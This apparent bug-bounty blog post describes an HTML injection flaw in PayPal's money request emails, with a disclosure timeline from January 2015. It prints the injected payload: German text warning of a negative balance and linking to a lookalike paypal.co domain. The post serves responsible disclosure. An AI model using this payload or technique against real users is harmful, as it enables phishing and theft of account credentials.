phishing with html

TL;DR: HTML inection within money request mail leads to phish.

I recently found a html injection vulnerability within Paypals money request function.

I was able to inject html code into a money request mail send from Paypal
to a victim user and turned it into a neat phishing mail.

injection point

keine<br><br><b>Hinweise von Paypal<br>Achtung!!</b> Dein Kontostand ist <b>negativ.<br><A HREF=“http://www.user.paypal.co/m/view?=invorce-134-2-41″>Jetzt handeln!</A><br>Dein Paypal Team.

The phishing mail sent through Paypal.

pp-phish
pp-phish2Timeline:

  • 20.01.2015 vulnerability discoverd
  • 22.01.2015 bug reported to paypal
  • 26.01.2015 paypal confirmed the issue
  • 28.01.2015 fix and reward